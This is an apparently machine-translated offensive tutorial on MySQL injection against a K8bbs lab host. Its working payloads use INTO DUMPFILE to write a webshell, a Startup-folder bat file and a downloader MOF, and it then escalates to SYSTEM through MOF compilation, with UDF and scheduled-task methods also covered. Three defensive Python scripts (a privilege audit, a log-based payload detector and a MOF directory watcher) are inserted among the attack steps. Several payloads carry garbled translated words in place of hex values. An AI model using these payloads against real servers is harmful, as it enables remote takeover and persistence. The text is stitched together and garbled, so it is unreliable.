Mysql injection point remote Trojan (no web physical path/non-root permission)

Source: Internet
Author: User

When an injection point exists in the application but the web physical path cannot be discovered, this method can still be used to obtain server permissions, as long as the file-export conditions are met. In practice, operator x encountered an injection point that did not have root permission but could read and write files, and had no web physical path (so a shell could not be written directly).

MySQL file export conditions:

1. Root permission (in fact, root is not required; an account with insert permission can also do it).
2. A writable directory (even with system permission, some directories cannot be written because of driver restrictions).

Whether you use sqlmap injection to write a shell or to execute commands, you must supply a web physical path. What if there is no path?
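As an added example (not from the original post), here is a defender-side audit of the two export conditions just listed, written in Python over constructed SHOW GRANTS output. In MySQL, INTO OUTFILE and INTO DUMPFILE require the global FILE privilege rather than root, and the server's secure_file_priv setting further limits where files may be written (NULL disables export, an empty value allows any server-writable path, a path restricts export to that directory). The account name and grant lines below are constructed.

```python
import re

# Constructed sample data (not from the original page): SHOW GRANTS output
# for a hypothetical web application account.
SAMPLE_GRANTS = [
    "GRANT SELECT, INSERT, FILE ON *.* TO 'webapp'@'%'",
    "GRANT ALL PRIVILEGES ON `k8bbs`.* TO 'webapp'@'%'",
]

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+", re.I)


def can_write_files(grant_lines):
    """True if any grant confers the FILE privilege.

    FILE is a global privilege, so only grants on *.* count; ALL PRIVILEGES
    on *.* includes it, ALL PRIVILEGES on a single database does not."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            return True
    return False


def export_scope(secure_file_priv):
    """Interpret secure_file_priv: None (NULL) disables import/export,
    '' allows any directory the server process can write, otherwise
    export is confined to the named directory."""
    if secure_file_priv is None:
        return "disabled"
    if secure_file_priv == "":
        return "any directory"
    return f"only under {secure_file_priv}"


def assess(grant_lines, secure_file_priv):
    """Combine both conditions into a single verdict for the account."""
    scope = export_scope(secure_file_priv)
    if not can_write_files(grant_lines):
        return "LOW: account lacks FILE privilege; INTO DUMPFILE/OUTFILE is refused"
    if scope == "disabled":
        return "LOW: FILE granted but secure_file_priv is NULL; exports are disabled"
    if scope == "any directory":
        return "HIGH: FILE granted and secure_file_priv is empty; any server-writable path is reachable"
    return f"MEDIUM: FILE granted; exports restricted {scope}"


if __name__ == "__main__":
    for setting in ("", None, "/var/lib/mysql-files/"):
        print(repr(setting), "->", assess(SAMPLE_GRANTS, setting))
```

The verdict still depends on the filesystem rights of the MySQL service account: on a Windows host where the service runs as SYSTEM, "any directory" really does mean the web root, the Startup folder and the wbem directories.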


Take the K8bbs injection vulnerability environment as the example (first export a shell, then export an exe Trojan file). Injection point:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 1,user(),3,4,5



Export a webshell (the method everyone knows):

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 1,2,3,4,unhex('hour') into dumpfile 'C:/AAWServer/www/php/k82.php';


Looking at the exported webshell content, we can see that it is preceded by 1234 (the values of the other fields). For a webshell that does no harm. But what if the exported file is binary? Exporting cmd.exe this way is certainly useless. There is also another situation that makes the shell fail to run: what if a PHP termination code appears in a field? So, to do this better, it is best to make sure that only the original webshell content is exported, by setting the other fields to 0x00. The actual result is that they are changed to null, which works the same for a webshell, but executable files such as exe and bat are


Exporting arbitrary files: the file is split and merged according to the principle described at the beginning, which solves the problem completely. After improving the payload, we find that the specified content is exported successfully, so the problem of exporting arbitrary files through the injection point is solved:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 0x3C3F,0x7068,0x7020,0x4065,unhex('weight') into dumpfile 'C:/AAWServer/www/php/k82.php';


Export a bat file to the Startup item; the bat can download a file or perform any other operation. If antivirus software is present, an alarm will be raised... this is also one of the defects of this method:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 0x6E,0x65,0x74,0x20,cannot into dumpfile 'C:/Documents and Settings/All Users/Start Menu/Programs/Startup/k8.bat';
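As an added defender-side example (not from the original post or the K8 tool), the following Python script scans web access-log lines for the pattern the export payloads above share: a UNION SELECT whose columns are hex literals, unhex() calls and NULLs, terminated by INTO DUMPFILE or INTO OUTFILE. Because DUMPFILE writes the row with no column separators, the columns can be concatenated to recover exactly what was written, and the target path tells whether the write aimed at a web root, the Startup folder or the wbem directory. The log lines, client address and hex values are constructed; the sample hex decodes to an empty PHP file.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The hex
# literals in the last request decode to "<?php ?>", an empty PHP file, so the
# sample is harmless while still exercising the split-field reconstruction.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /php/k8bbs/news.php?id=3 HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /php/k8bbs/news.php?id=3%20and%201=2%20union%20select%201,user(),3,4,5 HTTP/1.1" 200 700
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /php/k8bbs/news.php?id=3+and+1%3D2+union+select+null,0x3C3F,0x7068,unhex('70203F3E'),null+into+dumpfile+'C:/www/php/marker.php' HTTP/1.1" 200 700
"""

REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
UNION_RE = re.compile(r"union\s+select", re.I)
WRITE_RE = re.compile(
    r"union\s+select\s+(?P<fields>.*?)\s+into\s+(?P<mode>dumpfile|outfile)\s+'(?P<target>[^']*)'",
    re.I | re.S)

# Destinations that matter most when written to: web roots, the Startup
# folder (autorun on reboot) and the WMI mof drop directory.
SENSITIVE_PATH_HINTS = ("/www/", "\\www\\", "htdocs", "startup", "wbem")


def _from_hex(h):
    # MySQL pads an odd-length hex string with a leading zero.
    return bytes.fromhex(h if len(h) % 2 == 0 else "0" + h)


def decode_field(tok):
    """Bytes one SELECT column contributes to the dumped file.
    INTO DUMPFILE writes the row without separators, so columns are simply
    concatenated; NULL contributes nothing."""
    t = tok.strip()
    if t.lower() == "null":
        return b""
    m = re.fullmatch(r"0x([0-9a-f]*)", t, re.I)
    if m:
        return _from_hex(m.group(1))
    m = re.fullmatch(r"unhex\(\s*'([0-9a-f]*)'\s*\)", t, re.I)
    if m:
        return _from_hex(m.group(1))
    m = re.fullmatch(r"'([^']*)'", t)
    if m:
        return m.group(1).encode()
    if re.fullmatch(r"-?\d+", t):
        return t.encode()          # bare numbers are written as their digits
    return b"?"                    # e.g. user(): value not recoverable offline


def scan_log(text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        decoded = unquote_plus(query)      # undo %xx and '+' encoding first
        w = WRITE_RE.search(decoded)
        if w:
            content = b"".join(decode_field(f) for f in w.group("fields").split(","))
            target = w.group("target")
            findings.append({
                "line": lineno, "kind": "file_write", "path": path,
                "mode": w.group("mode").lower(), "target": target,
                "content": content,
                "sensitive_target": any(h in target.lower() for h in SENSITIVE_PATH_HINTS),
            })
        elif UNION_RE.search(decoded):
            findings.append({"line": lineno, "kind": "union_select", "path": path})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A real deployment would feed the same function from the web server's live access log; the reconstructed content is what an incident responder should compare against the file that actually landed on disk.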


Mysql injection methods

1. Export an hta, vbs, bat or exe to the Startup item, or load a script. This method requires the target machine to restart... if the administrator never restarts the server it is ineffective. If antivirus software is on the server, the exported executable is likely to be intercepted directly.

2. Scheduled tasks (the script that worked in the local test environment was not valid when thrown at the target machine).

3. UDF privilege escalation (conditional on being able to execute functions such as create; then commands can be executed). Sometimes the injection point length limit means the whole UDF cannot be exported.

4. The method below, which fully resolves the defects of the three methods above.

MOF Privilege Escalation

1. The MOF privilege escalation found on the Internet has a defect: it uses JavaScript code to execute commands, and privilege escalation by adding a user cannot be completed in one script.

Even after studying it the problem was not solved... we found that echo and similar commands did not write their output to the specified directory...

2. In practice this is an injection case: you need to obtain target information by executing commands through mof... so I thought about reading and writing js files... this is indeed feasible, but executing multiple commands in the same script is painful.

3. Baidu only turned up the script for adding a user. Just as I was getting disappointed, I suddenly thought of vbs.

Recalling the IE shidong of MS14065, we had already completed VBS FTP download and HTTP download.

Yes, calling vbs from mof solves several problems... executing multiple commands, and quickly generating and exporting arbitrary-file payloads for the injection point and the Trojan.

The number of fields differs between injection points, and the content of the file to be converted also differs.

To export different files through an injection point, the hex content must be split, which is troublesome and error-prone.

So, to improve working efficiency, a one-click function for splitting file HEX content was added to the flying knife.

Example tutorial (the image is on the next page). Injection point:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 1,user(),3,4,5

Export shell payload:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select 0x3C3F,0x7068,0x7020,0x4065,unhex('weight') into dumpfile 'C:/AAWServer/www/php/k82.php';

Replace all fields with null:

http://192.168.85.142/php/k8bbs/news.php?id=3 and 1=2 union select null,null into dumpfile 'C:/AAWServer/www/php/k82.php';

In the flying knife's encoding/decoding module, right-click the payload content and choose Encoding conversion --- File/File --- Mysql inject Output. A file selection dialog appears (select the file you want to export); click OK and the payload code to export the corresponding file is generated automatically.



Select the downexec.mof file in the Apsara stack-Mysql elevation directory, modify the exe address, and click Open.


The converted payload is shown below. Executing this code exports our mof downloader onto the target machine.


If the MOF script is correct, the mof script in the C:\WINDOWS\system32\wbem\MOF\good directory will be moved to the C:\WINDOWS\system32\wbem\mof\bad directory in about 20 seconds, and our specified exe will also appear in C:\WINDOWS\Temp.
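As an added example (not part of the original post or the K8 tool), here is a small Python poller for the mechanism just described: on these Windows versions, WMI compiles a .mof dropped into wbem\mof and moves it to the good\ or bad\ subdirectory within roughly 20 seconds. Diffing snapshots of those three directories surfaces both the drop and the subsequent compile, which is the signal a defender wants from this technique. The directory names come from the post; the self-check uses a temporary directory and a constructed placeholder file rather than a real MOF.

```python
import os
import tempfile
from pathlib import Path

# Directories named in the post: the mof drop directory and the good/bad
# subdirectories WMI moves compiled files into.
DEFAULT_MOF_DIRS = [
    r"C:\WINDOWS\system32\wbem\mof",
    r"C:\WINDOWS\system32\wbem\mof\good",
    r"C:\WINDOWS\system32\wbem\mof\bad",
]


def snapshot(dirs):
    """Map (directory, filename) to mtime; directories that do not exist are skipped."""
    state = {}
    for d in dirs:
        p = Path(d)
        if not p.is_dir():
            continue
        for f in p.iterdir():
            if f.is_file():
                state[(str(p), f.name)] = f.stat().st_mtime
    return state


def new_mof_files(before, after):
    """Keys that appeared since the previous snapshot, newest first."""
    added = [k for k in after if k not in before]
    return sorted(added, key=lambda k: after[k], reverse=True)


def alerts(before, after):
    """One human-readable line per new file, tagged by which directory it landed in."""
    out = []
    for d, name in new_mof_files(before, after):
        low = d.lower()
        tag = "compiled" if low.endswith("good") else "rejected" if low.endswith("bad") else "dropped"
        out.append(f"{tag}: {os.path.join(d, name)}")
    return out


def simulate_drop():
    """Self-check in a temporary directory (constructed, not a live host):
    drop a placeholder, then mimic WMI accepting it by moving it to good\\.
    Returns (alerts after the drop, alerts after the move)."""
    with tempfile.TemporaryDirectory() as td:
        dirs = [os.path.join(td, "mof"),
                os.path.join(td, "mof", "good"),
                os.path.join(td, "mof", "bad")]
        for d in dirs:
            os.makedirs(d, exist_ok=True)
        s0 = snapshot(dirs)
        src = Path(dirs[0], "dropped.mof")
        src.write_text("// constructed placeholder, not a real MOF file\n")
        s1 = snapshot(dirs)
        src.rename(Path(dirs[1], "dropped.mof"))
        s2 = snapshot(dirs)
        hide = lambda xs: [a.replace(td, "<tmp>") for a in xs]
        return hide(alerts(s0, s1)), hide(alerts(s1, s2))


if __name__ == "__main__":
    print(simulate_drop())
    # On a Windows host (assumed to run as an account that can read wbem\mof):
    # before = snapshot(DEFAULT_MOF_DIRS); wait ~20 s; print(alerts(before, snapshot(DEFAULT_MOF_DIRS)))
```

A drop followed by a "compiled" alert is the pair to page on; a file that only ever shows up under bad\ still records an attempt.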


In the test environment on Win2003 it launched, but the SYSTEM permission turned out not to be ideal: switching to the user's remote-control screen control gives a completely black screen, and part of the cmd functionality is also affected by the system permission; the highest permission does not let you do everything...

For example, a company has a strict permission distribution... the manager is only responsible for management... the actual work is done by the people below... some passwords are held by the people below. Controlling the manager does not let you do everything directly... you still need to downgrade... or instruct the people below to do those things.... For details, refer to the tutorial on the Windows permission system released by K8, which provides a tool for switching operation between system and admin.
